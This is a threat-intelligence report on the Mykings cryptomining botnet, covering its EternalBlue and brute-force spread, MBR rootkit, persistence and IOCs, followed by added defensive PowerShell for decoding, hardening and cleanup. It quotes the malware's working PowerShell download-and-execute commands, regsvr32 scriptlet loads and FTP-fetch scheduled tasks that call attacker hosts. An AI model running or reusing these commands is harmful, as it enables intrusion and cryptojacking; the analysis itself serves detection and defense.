Mykings mining botnet updates infrastructure, new wallet gains exceed 600,000

Background

Tencent Security Yujian Threat Intelligence Center recently detected that the Mykings mining botnet has updated its infrastructure. The malware has switched to a new domain name, the mining income in its new wallet has exceeded RMB 600,000, and it is still mining at a rate of about 10 XMR per day.

Mykings gains entry by brute-forcing port 1433 (MSSQL) and exploiting the EternalBlue vulnerability, then implants RAT and miner Trojans to build a large botnet.

The updated version of Mykings mining botnet has the following features:

1. It attacks by exploiting the EternalBlue vulnerability and brute-forcing port 1433, and its attack payloads contain Mirai botnet infection code.

2. It infects the MBR (the same infection process as the Dark Cloud virus) and uses a rootkit to counter antivirus software and download payloads.

3. It removes competing mining Trojans and closes ports to cut off other viruses' intrusion channels.

4. It achieves persistence by installing multiple scheduled-task backdoors and WMI backdoors.

Mykings Mining Botnet

Detailed analysis

The infected device executes the following PowerShell command through the WMI backdoor:

$wc=New-Object System.Net.WebClient;$wc.DownloadString('http[:]//74.222.14.94/blue.txt').trim() -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}

It then reads the download addresses of the three Trojans from blue.txt and downloads and executes them one by one:

The above three Trojans are analyzed as follows:

  • ok.exe

The function of ok.exe is to infect the MBR, thereby achieving self-protection, resistance to antivirus software, and the ability to download payloads from the Internet.

The infection process is similar to the Dark Cloud series of viruses discovered by Tencent Yujian Threat Intelligence Center (see https://s.tencent.com/research/report/622.html). In its final stage the MBR Trojan hooks ZwCreateSection; when the hook gains execution it maps the rootkit into kernel space and runs it, then jumps back to ZwCreateSection to continue normal execution.

The rootkit's main functions are self-protection, terminating antivirus processes, and injecting into the system process winlogon.exe to download the payload for the next stage of malicious activity.

The rootkit obtains the IP address used to update the Trojan from http[:]//www.upme0611.info/address.txt

It then fetches the next-stage payload configuration file http[:]//mbr.kill0604.ru/cloud.txt, reads the download address of the mining module upsupx.exe from it, and downloads and executes that file.

  • upsupx.exe

upsupx.exe is downloaded, saved as C:\Windows\Temp\conhost.exe and executed. It downloads the decryption and mining-related configuration file to C:\Program Files\Common Files\xpdown.dat. The configuration file content is as follows:

45.58.135.106

74.222.14.61

139.5.177.10

ok.xmr6b.ru

It then obtains the list of competitor or old-version mining Trojans to remove, including file name, path, and whether to remove it.

Next it reads the registry key HARDWARE\DESCRIPTION\System\CentralProcessor\0 to detect the CPU type and frequency, and selects which mining program to use accordingly.

It downloads the open-source mining program XMRig (version 2.14.1) from http[:]//198.148.90.34/64work.rar; the miner is started from C:\Windows\inf\lsmm.exe.

After startup it reads the mining configuration from its resource section; the mining pool address is pool.minexmr.com:5555

Wallet: 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

Querying the wallet shows that 1077 XMR has been mined, which at the current market price is equivalent to about RMB 600,000.

  • u.exe

u.exe uses the attack module C:\Windows\system\msinfo.exe to scan and attack IP ranges on both the intranet and the Internet. Its methods include exploiting the EternalBlue vulnerability and brute-forcing SQL, Telnet and RDP logins. Some attack payloads also contain code for infecting devices with the Mirai botnet.

Scan ports 445/1433 etc.

EternalBlue Vulnerability Attack

SQL brute force attack

Execute shellcode after a brute-forced login

Telnet brute force attack

RDP brute force attack

Persistence

The Mykings mining botnet uses the following methods to maintain persistence:

1. Delete login accounts created by other viruses

It uses net user to delete the accounts mm123$, admin and sysadm05; uses attrib to set files in the Temp directory to hidden; uses taskkill to kill other mining processes, then deletes their files and remote desktop program files; and uses cacls to restrict access to some directories and files.

It uses wmic to delete mining programs disguised as system processes; the criterion is a process that carries a system process name but whose file is not in the system directory.

2. Set the properties of related files and paths to hidden

3. Turn off system self-update

It deletes the following scheduled tasks and turns off system self-update:

SCHTASKS /Delete /TN "WindowsUpdate1" /F &SCHTASKS /Delete /TN "WindowsUpdate3" /F &SCHTASKS /Delete /TN "Windows_Update" /F &SCHTASKS /Delete /TN "Update" /F &SCHTASKS /Delete /TN "Update2" /F &SCHTASKS /Delete /TN "Update4" /F &SCHTASKS /Delete /TN "Update3" /F &SCHTASKS /Delete /TN "windowsinit" /F &SCHTASKS /Delete /TN "System Security Check" /F &SCHTASKS /Delete /TN "AdobeFlashPlayer" /F &SCHTASKS /Delete /TN "updat_windows" /F &SCHTASKS /Delete /TN "at1" /F &SCHTASKS /Delete /TN "at2" /F &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F &SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F

4. Block connections to ports 139/445 etc.

Windows Firewall settings: allow connection requests on port 65536 and deny connections on ports 135/137/138/139/445.

5. Add registry startup items

Adds a Run startup item to the registry:

6. Add a large number of scheduled task backdoors

Adds five scheduled tasks:

Task 1: Mysa

Execute: cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe

Task 2: Mysa1

Execute: rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

Task 3: Mysa2

Execute: cmd /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

Task 4: Mysa3

Execute: /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe

Task 5: OK

Execute: cmd c:\windows\debug\ok.dat,ServiceMain aaaa

Tasks 1, 3 and 4 each write an FTP script (login test, password 1433) that fetches a file from ftp.0603bye.info and then run the downloaded file; tasks 2 and 5 invoke the ServiceMain export of the downloaded .dat files. The backdoor function of each scheduled task is summarized as follows:

7. Add a WMI backdoor to execute a large number of commands

The backdoor is added by creating WMI event filters and consumers.

It first deletes the old event filters and consumers:

fuckyoumm2_filter

fuckyoumm2_consumer

Windows Events Filter

Windows Events Consumer4

Windows Events Consumer

fuckayoumm3

fuckayoumm4

Then it creates a new event filter and consumer:

fuckyoumm3

fuckyoumm4

The code executed by the WMI backdoor is:

(1) powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

After decoding:

$wc=New-Object System.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim() -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}

(2) powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3) powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4) powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg') || regsvr32 /u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5) regsvr32 /u /s /i:http[:]//173.208.139.170/2.txt scrobj.dll

(6) regsvr32 /u /s /i:http[:]//139.5.177.19/3.txt scrobj.dll

The command functions executed by the WMI backdoor are summarized as follows:
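The WMI consumer's first command is a Base64-encoded PowerShell payload. The following PowerShell is an added example for analysts (it is not code from the report or from Tencent): it decodes a "-enc" payload, tolerating the line-wrap whitespace and defanging that published copies often contain, and then lists the download and execution primitives found in the decoded script. The function names, the indicator patterns and the output format are this example's own choices; the encoded string used as input is the one quoted above.

```powershell
# Added example (not from the original report): decode a PowerShell "-enc"
# payload and list the downloader primitives it contains, for triage.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$EncodedCommand)

    # -enc payloads are Base64 over UTF-16LE. Drop anything outside the Base64
    # alphabet (wrap spaces, quotes, defanging brackets) and repair the padding
    # so that a slightly damaged copy still decodes instead of throwing.
    $clean = $EncodedCommand -replace '[^A-Za-z0-9+/]', ''
    if ($clean.Length % 4 -eq 1) { $clean = $clean.Substring(0, $clean.Length - 1) }
    $clean = $clean.PadRight($clean.Length + ((4 - $clean.Length % 4) % 4), '=')

    $bytes = [Convert]::FromBase64String($clean)
    return [Text.Encoding]::Unicode.GetString($bytes)
}

function Get-DownloaderIndicators {
    param([Parameter(Mandatory)][string]$Script)

    # Primitives used by the commands in this report; each match is a triage hit.
    # The pattern set is this example's own and is not exhaustive.
    $patterns = @{
        'WebClient'        = 'New-Object\s+System\.Net\.WebClient'
        'DownloadString'   = '\.DownloadString\('
        'DownloadFile'     = '\.DownloadFile\('
        'InvokeExpression' = '\b(IEX|Invoke-Expression)\b'
        'StartProcess'     = '(^|[;{|\s])start\s+\$'
        'Url'              = 'https?://[^\s''"]+'
    }
    $hits = [ordered]@{}
    foreach ($name in ($patterns.Keys | Sort-Object)) {
        $m = [regex]::Matches($Script, $patterns[$name], 'IgnoreCase')
        if ($m.Count -gt 0) { $hits[$name] = @($m | ForEach-Object { $_.Value }) }
    }
    return $hits
}

# Input: the encoded command quoted in the report (WMI backdoor command 1).
$reportEnc = 'JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=='

$decoded = ConvertFrom-EncodedCommand $reportEnc
"Decoded: $decoded"
$indicators = Get-DownloaderIndicators $decoded
foreach ($entry in $indicators.GetEnumerator()) {
    '{0}: {1}' -f $entry.Key, ($entry.Value -join ', ')
}
```

Run it in any PowerShell session; nothing is executed from the decoded text, it is only decoded and pattern-matched. The same two functions work on the command line captured in a Sysmon process-creation event or in a WMI-Activity log entry, which is where this payload surfaces on a live host.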

Security Tips

1. MS17-010 "EternalBlue" vulnerability

Temporarily close unnecessary ports on the server (such as 135, 139, 445). For details, see: https://guanjia.qq.com/web_clinic/s8/585.html

Download and install Windows patches to fix the EternalBlue series of vulnerabilities promptly:

XP, Windows Server 2003, Windows 8 and other systems: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Windows 7, Windows 8.1, Windows Server 2008, Windows 10, Windows Server 2016 and other systems: https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
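The two recommendations above (patch MS17-010, close the propagation ports) can be audited and enforced from PowerShell. The script below is an added example and is not part of the report or of Tencent's tooling. It checks for the MS17-010 hotfix, the state of SMBv1 (the protocol EternalBlue targets), what is listening on the ports the botnet scans, and inbound firewall rules for ports 135/137/138/139/445; with -Apply it disables SMBv1 and creates the rules. KB4012598 is the only KB the report quotes, so the KB list must be extended with the one for the host's build; the rule names and function name are this example's own.

```powershell
# Added example (not from the original report): audit and, with -Apply, enforce
# the report's mitigations on one Windows host. Run elevated on Windows 8 /
# Server 2012 or later (SmbShare and NetSecurity modules).

function Invoke-MykingsHardening {
    param([switch]$Apply)   # without -Apply the function only reports

    $kbs       = @('KB4012598')            # add the MS17-010 KB for your build
    $scanPorts = @(135, 139, 445, 1433)    # ports the botnet scans or brute-forces
    $blockTcp  = @(135, 139, 445)          # deny list from the report (TCP)
    $blockUdp  = @(137, 138)               # NetBIOS name/datagram service (UDP)
    $report    = [ordered]@{}

    # 1. MS17-010. A later cumulative update can supersede the original KB, so a
    #    miss is a prompt to check the build's update history, not proof of
    #    being unpatched.
    $installed = Get-HotFix | Where-Object { $kbs -contains $_.HotFixID }
    $report['MS17-010 KB present'] = [bool]$installed

    # 2. SMBv1 is what EternalBlue exploits; turn it off on the server side.
    $smb = Get-SmbServerConfiguration
    $report['SMBv1 enabled'] = $smb.EnableSMB1Protocol
    if ($Apply -and $smb.EnableSMB1Protocol) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }

    # 3. What is actually listening on the scanned ports (1433 is reported but
    #    not blocked here, because a real SQL Server may need it).
    $listening = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
                 Where-Object { $scanPorts -contains $_.LocalPort } |
                 Select-Object -ExpandProperty LocalPort -Unique
    $report['Listening on scanned ports'] = ($listening -join ', ')

    # 4. Inbound deny rules. The report's "allow port 65536" is a no-op (no such
    #    port), so only the deny side is reproduced.
    $rules = @(
        @{ Name = 'Block Mykings propagation TCP'; Proto = 'TCP'; Ports = $blockTcp },
        @{ Name = 'Block Mykings propagation UDP'; Proto = 'UDP'; Ports = $blockUdp }
    )
    foreach ($r in $rules) {
        $exists = Get-NetFirewallRule -DisplayName $r.Name -ErrorAction SilentlyContinue
        $report["Rule '$($r.Name)'"] = if ($exists) { 'present' } else { 'missing' }
        if ($Apply -and -not $exists) {
            New-NetFirewallRule -DisplayName $r.Name -Direction Inbound -Action Block `
                -Protocol $r.Proto -LocalPort $r.Ports -Profile Any | Out-Null
        }
    }
    return $report
}

Invoke-MykingsHardening           # audit only
# Invoke-MykingsHardening -Apply  # disable SMBv1 and add the deny rules
```

Blocking 445 and 139 inbound also cuts off legitimate file sharing to the host, which is why the report calls the port closure temporary: apply it while patching, then narrow the rules to the networks that genuinely need SMB.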

2. Use strong passwords on servers and avoid weak ones, so that attackers cannot brute-force them.

3. Use antivirus software to intercept possible attacks.

4. In addition to using Tencent Yujian to detect and remove the Mykings virus, infected users can also clean it up manually with the following steps:

1) Delete files

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\Help\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2) Delete the registry value

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3) Delete scheduled tasks

Mysa

Mysa1

Mysa2

Mysa3

OK

4) Delete WMI event filters and consumers

fuckyoumm2_filter

fuckyoumm2_consumer

Windows Events Filter

Windows Events Consumer4

Windows Events Consumer

fuckayoumm3

fuckayoumm4

fuckyoumm3

fuckyoumm4
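The four manual cleanup steps above, together with the persistence artifacts described earlier (the Run value, the Mysa*/OK scheduled tasks and the WMI event filters and consumers), can be checked on a host in one pass. The following PowerShell is an added example and is not code from the report or from Tencent: it reports every artifact from the lists above that is present on the machine and, only when run with -Remove, deletes it. The file paths, task names, registry value and WMI names are the report's; the function name, the output format, the additional check of the native (non-Wow6432Node) Run key and the ok.dat/xpdown.dat entries taken from the analysis section are this example's additions.

```powershell
# Added example (not from the original report): sweep one host for the Mykings
# persistence artifacts listed in the report. Reports by default; -Remove
# deletes what it finds. Run elevated. Files the malware hid with attrib or
# locked down with cacls may need "icacls <file> /reset" before deletion.

function Invoke-MykingsSweep {
    param([switch]$Remove)

    $files = @(
        'C:\Windows\System32\ok.exe',         'C:\Windows\System32\max.exe',
        'C:\Windows\SysWOW64\drivers\64.exe', 'C:\Windows\system\downs.exe',
        'C:\Windows\Temp\conhost.exe',        'C:\Windows\System32\upsupx.exe',
        'C:\Windows\inf\lsmm.exe',            'C:\Windows\inf\msief.exe',
        'C:\Windows\System32\s.exe',          'C:\Windows\system\msinfo.exe',
        'C:\Windows\Help\lsmosee.exe',        'C:\Windows\debug\lsmosee.exe',
        'C:\Windows\debug\item.dat',          'C:\Windows\debug\ok.dat',
        'C:\Program Files\Common Files\xpdown.dat'
    )
    $tasks    = @('Mysa', 'Mysa1', 'Mysa2', 'Mysa3', 'OK')
    $wmiNames = @('fuckyoumm2_filter', 'fuckyoumm2_consumer', 'Windows Events Filter',
                  'Windows Events Consumer4', 'Windows Events Consumer',
                  'fuckayoumm3', 'fuckayoumm4', 'fuckyoumm3', 'fuckyoumm4')
    # The report lists the Wow6432Node key; the native key is checked as well.
    $runKeys  = @('HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
                  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run')
    $findings = @()

    # Running copies first, so that the files can be deleted afterwards.
    foreach ($p in (Get-Process | Where-Object { $_.Path -and ($files -contains $_.Path) })) {
        $findings += "process: $($p.Id) $($p.Path)"
        if ($Remove) { Stop-Process -Id $p.Id -Force }
    }
    foreach ($f in $files) {
        if (Test-Path -LiteralPath $f) {
            $findings += "file: $f"
            if ($Remove) { Remove-Item -LiteralPath $f -Force }
        }
    }
    foreach ($k in $runKeys) {
        $v = Get-ItemProperty -Path $k -Name 'start' -ErrorAction SilentlyContinue
        if ($v) {
            $findings += "run value: $k\start = $($v.start)"
            if ($Remove) { Remove-ItemProperty -Path $k -Name 'start' }
        }
    }
    foreach ($t in $tasks) {
        $task = Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue
        if ($task) {
            $cmd = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
            $findings += "task: $t -> $cmd"
            if ($Remove) { Unregister-ScheduledTask -TaskName $t -Confirm:$false }
        }
    }
    # WMI subscriptions: bindings first, then the consumers and filters they join.
    $ns = 'root\subscription'
    $bindings = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
                Where-Object { $wmiNames -contains $_.Filter.Name -or $wmiNames -contains $_.Consumer.Name }
    foreach ($b in $bindings) {
        $findings += "wmi binding: $($b.Filter.Name) -> $($b.Consumer.Name)"
        if ($Remove) { $b | Remove-CimInstance }
    }
    foreach ($class in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer', '__EventFilter') {
        $hits = Get-CimInstance -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue |
                Where-Object { $wmiNames -contains $_.Name }
        foreach ($h in $hits) {
            $detail = switch ($class) {
                '__EventFilter'            { $h.Query }
                'CommandLineEventConsumer' { $h.CommandLineTemplate }
                default                    { $h.ScriptText }
            }
            $findings += "wmi ${class}: $($h.Name) -> $detail"
            if ($Remove) { $h | Remove-CimInstance }
        }
    }
    return $findings
}

Invoke-MykingsSweep            # report only
# Invoke-MykingsSweep -Remove  # delete everything that was reported
```

Because the rootkit described above protects its files and processes from user mode, a host where the sweep reports findings but deletion fails should be treated as still compromised and rebuilt from a clean MBR and image rather than cleaned in place.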

IOCs

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

54.255.141.50

Domain

www.upme0611.info

mbr.kill0604.ru

ok.xmr6b.ru

js.0603bye.info

pc.pc0416.xyz

down2.b5w91.com

wmi.1217bye.host

down.mys2018.xyz

URL

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe

http[:]//139.5.177.10/upsupx.exe

http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/address.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

Wallet: 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

Reference Links

https://www.freebuf.com/articles/web/146393.html

https://s.tencent.com/research/report/622.html

https://www.freebuf.com/column/187489.html

Source: Tencent Yujian Threat Intelligence Center
